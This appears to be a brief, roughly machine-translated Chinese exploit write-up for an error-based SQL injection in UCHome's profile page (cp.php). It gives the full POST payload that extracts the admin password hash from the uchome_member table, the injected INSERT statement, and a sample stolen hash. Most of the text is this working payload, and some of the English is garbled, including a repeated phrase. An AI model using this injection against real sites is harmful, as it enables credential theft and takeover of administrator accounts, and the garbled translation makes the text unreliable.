If the table prefix is obtained through the preceding SQL error message, the hash with the username admin can be cracked.
To cp. php? Ac = profile & op = info POST submit parameters:
Profilesubmit = 1 & formhash = 232d1c54 & info [A', (select 1 from (select count (*), concat (SELECT concat (password) FROM uchome_member where username like 'admin % '), floor (rand (0) * 2) x from information_schema.tables group by x) a), '1') #] = 1
The SQL statement is:
Insert into uchome_spaceinfo (uid, type, subtype, title, friend) VALUES ('3', 'info', '', (select 1 from (select count (*), concat (SELECT concat (password) FROM uchome_member where username like 'admin % '), floor (rand (0) * 2) x from information_schema.tables group by x) ), '1') # ', '1', '0 ')
The obtained Admin hash is 6ad9ab1e6a74f51b57079c97329d208c, the last one is group_key, and the last one is group_key.
From: black box of RAyh4c
Popular Science 1 http://www.bkjia.com/Article/201108/100722.html of mysql brute-force Injection
Popular Science 3 http://www.bkjia.com/Article/201108/100724.html of mysql brute-force Injection